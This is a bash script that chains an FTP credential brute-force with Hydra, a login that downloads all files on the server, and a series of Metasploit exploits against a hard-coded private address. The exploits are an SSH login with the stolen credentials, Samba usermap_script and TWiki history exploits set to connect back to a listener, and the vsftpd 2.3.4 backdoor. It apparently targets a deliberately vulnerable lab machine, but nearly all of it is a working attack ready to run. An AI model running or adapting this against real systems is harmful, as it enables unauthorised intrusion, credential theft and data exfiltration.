#!/bin/bash
# Settings shared by the rest of the script.
# target_ip is a placeholder that has to be replaced with the address of the
# host under test; ftp_port is the TCP port used for the FTP credential check.
target_ip='<IP>'
ftp_port=21

# Both start out empty and are assigned further down, once a credential pair
# has been extracted from the Hydra output.
ftp_username=
ftp_password=
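#######################################
# Report a fatal error and terminate the script.
# Arguments:
#   $1 - exit status to terminate with
#   $2 - human-readable description of what failed
# Outputs:
#   Writes "Error: <message> (Exit Code: <status>)" to stderr.
# Returns:
#   Never returns. Exits with $1, or with 1 when $1 is missing, is not a
#   non-negative integer, or would reach the parent process as 0.
#######################################
handle_error() {
  local exit_code=${1:-1}
  local error_message=${2:-unknown error}

  # A failure path must never end in a success status. Callers in this file
  # pass "$?" from inside an `if [ $? -ne 0 ]` body, where it has already been
  # reset to 0 by the test itself.
  if [[ "$exit_code" =~ ^[0-9]+$ ]]; then
    # Force base 10 (leading zeros) and apply the 8-bit wrap the shell would
    # apply anyway, so that e.g. 256 is not silently turned into 0.
    exit_code=$(( 10#$exit_code % 256 ))
  else
    exit_code=0
  fi
  (( exit_code != 0 )) || exit_code=1

  # Diagnostics go to stderr so they are not captured by $(...) or mixed into
  # piped output.
  printf 'Error: %s (Exit Code: %s)\n' "$error_message" "$exit_code" >&2
  exit "$exit_code"
}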
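#######################################
# Open a non-interactive FTP session to $target_ip and run a fixed command
# list.
# Globals:
#   target_ip (read)
# Arguments:
#   $1 - FTP user name
#   $2 - FTP password
# Outputs:
#   A one-line notice, followed by whatever the ftp client prints with -v.
# Returns:
#   0 when the ftp client exits 0; otherwise terminates the script through
#   handle_error with the client's exit status.
#######################################
ftp_execute() {
  local username=$1
  local password=$2
  local status

  # This line runs before the login is attempted, so it must not claim
  # success. The password is left out so that terminal scrollback and captured
  # output do not hold plaintext credentials.
  printf 'Opening FTP session to %s as user: %s\n' "$target_ip" "$username"

  # printf '%s\n' passes the credentials through verbatim; echo -e would
  # expand backslash sequences inside them.
  # Sent in order: log in, list the directory, switch to binary mode, turn off
  # per-file prompting, fetch every file in the directory, disconnect.
  printf '%s\n' \
    "user $username $password" \
    'ls -la' \
    'binary' \
    'prompt' \
    'mget *' \
    'quit' \
    | ftp -nv "$target_ip"
  status=$?

  # $? has to be saved straight after the pipeline; inside the `if` body it
  # would already hold the status of the test (0).
  # NOTE(review): ftp clients commonly exit 0 even when the server rejects the
  # login, so a zero status is not proof that the session succeeded. Confirm
  # against the transcript.
  if (( status != 0 )); then
    handle_error "$status" "FTP command execution failed"
  fi
}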
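# FTP credential check with Hydra against $target_ip:$ftp_port, using the
# usernames.txt and password.txt lists from the current directory.
echo "Performing FTP brute-force on $target_ip"
# NOTE(review): nothing on this command line visibly needs root; confirm
# whether sudo can be dropped so the tool runs with least privilege.
hydra_result=$(sudo hydra -t 4 -L usernames.txt -P password.txt "ftp://${target_ip}:${ftp_port}")
hydra_status=$?

# The status is saved immediately: inside the `if` body "$?" would be the
# result of the test itself (0), and the failure would be reported as exit 0.
if (( hydra_status != 0 )); then
  handle_error "$hydra_status" "Hydra execution failed"
fi

# The output is treated as a hit when it contains a "login:" or "password:"
# field.
if grep -q "login:\|password:" <<<"$hydra_result"; then
  echo "FTP login successful with the following credentials:"
  # This prints the recovered credentials in plaintext; keep the output out of
  # shared logs and CI transcripts.
  echo "$hydra_result"

  # Keep only the first reported pair.
  ftp_username=$(printf '%s\n' "$hydra_result" | grep -o "login: \w\+" | cut -d ' ' -f 2 | head -n 1)
  ftp_password=$(printf '%s\n' "$hydra_result" | grep -o "password: \w\+" | cut -d ' ' -f 2 | head -n 1)

  # The match above does not guarantee that both fields could be extracted;
  # do not open an FTP session with an empty user name or password.
  if [[ -n "$ftp_username" && -n "$ftp_password" ]]; then
    ftp_execute "$ftp_username" "$ftp_password"
    echo " " # Add a space after FTP commands execution
  else
    echo "Could not extract a credential pair from the Hydra output." >&2
  fi
else
  echo "FTP login unsuccessful with Hydra."
fi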
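# Operator note: msfconsole may have to be left by typing "exit" or "exit -y"
# after each module finishes, before the script moves on to the next one.

#######################################
# Write a one-shot msfconsole resource script for a module and run it.
# Globals:
#   ftp_username, ftp_password (read) - used only for
#     auxiliary/scanner/ssh/ssh_login
# Arguments:
#   $1 - module path passed to `use`
#   $2 - value for RHOSTS
#   $3, $4 - accepted so existing callers keep working; not used
# Returns:
#   0 when msfconsole exits 0; otherwise terminates the script through
#   handle_error with msfconsole's exit status.
#######################################
execute_msf_module() {
  local module_name=$1
  local rhost=$2
  local rc_file status
  local -a rc_lines=("use $module_name" "set RHOSTS $rhost")

  if [[ "$module_name" == "auxiliary/scanner/ssh/ssh_login" ]]; then
    rc_lines+=("set USERNAME $ftp_username" "set PASSWORD $ftp_password")
  fi

  if [[ "$module_name" == "exploit/multi/samba/usermap_script" ||
        "$module_name" == "exploit/unix/webapp/twiki_history" ]]; then
    # NOTE(review): this address is hard-coded; confirm it matches the host
    # the script is run from.
    rc_lines+=("set LHOST 192.168.40.130")
  fi

  # The trailing empty entry reproduces the blank last line of the original
  # resource script.
  rc_lines+=("exploit" "exit" "")

  # The resource script can contain a plaintext password, so it is written to
  # a private mktemp file (readable only by the current user) instead of a
  # fixed, guessable name in the current directory.
  rc_file=$(mktemp) || handle_error "$?" "could not create msfconsole resource file"
  printf '%s\n' "${rc_lines[@]}" > "$rc_file"

  echo "Starting msfconsole..."
  # When stdin is not a terminal, msfconsole is given /dev/null instead,
  # presumably so it cannot block waiting for input.
  if [[ -t 0 ]]; then
    msfconsole -q -r "$rc_file"
  else
    msfconsole -q -r "$rc_file" < /dev/null
  fi
  status=$?

  # Remove the file before checking the status: handle_error exits, and the
  # resource script must not be left behind on the failure path.
  rm -f -- "$rc_file"

  # $? was saved above because inside the `if` body it would be the status of
  # the test (0), not of msfconsole.
  if (( status != 0 )); then
    handle_error "$status" "msfconsole execution failed"
  fi
}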
# Run three modules back to back against the same host. After each one:
# announce progress, wait five seconds, then ask msfconsole to kill all
# sessions.
# NOTE(review): the host is hard-coded here while the rest of the script reads
# $target_ip; confirm which of the two is intended.
for msf_module in \
  "auxiliary/scanner/ssh/ssh_login" \
  "exploit/multi/samba/usermap_script" \
  "exploit/unix/webapp/twiki_history"; do
  execute_msf_module "$msf_module" "192.168.40.128" "" ""
  echo "Exploit in Progress"

  sleep 5
  echo "Killing the sessions..."
  # msfconsole keeps the terminal only when stdin is one; otherwise it is
  # given /dev/null.
  # NOTE(review): this is a new msfconsole process, separate from the one
  # execute_msf_module started; confirm `sessions -K` has anything to act on.
  if ! [ -t 0 ]; then
    msfconsole -q -x "sessions -K" < /dev/null
  else
    msfconsole -q -x "sessions -K"
  fi

  # NOTE(review): `< /dev/null` replaces the pipe as msfconsole's stdin, so
  # the "exit" written by echo is never read.
  echo "exit" | msfconsole -q < /dev/null
done
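# Final stage: run the vsftpd_234_backdoor module against $target_ip through a
# throwaway msfconsole resource script.
listener_port="4445" # Change this to your desired listener port
# NOTE(review): listener_port is assigned but not read by any line shown here.

# The resource script goes into a private mktemp file rather than a fixed
# name in the current directory, so it cannot clobber an existing file or be
# pre-created by another local user.
msf_ftp_rc=$(mktemp) || handle_error "$?" "could not create msfconsole resource file"

# printf '%s\n' writes the same lines as the original echo -e, including the
# blank last line, without expanding backslashes inside $target_ip.
printf '%s\n' \
  'use exploit/unix/ftp/vsftpd_234_backdoor' \
  "set RHOST $target_ip" \
  'exploit -j' \
  '' > "$msf_ftp_rc"

echo "Final FTP Exploit in Progress"
echo "Starting msfconsole for FTP exploit..."
# The resource script has no `exit` line, so msfconsole is not told to quit
# after the module has been started.
msfconsole -q -r "$msf_ftp_rc"
rm -f -- "$msf_ftp_rc"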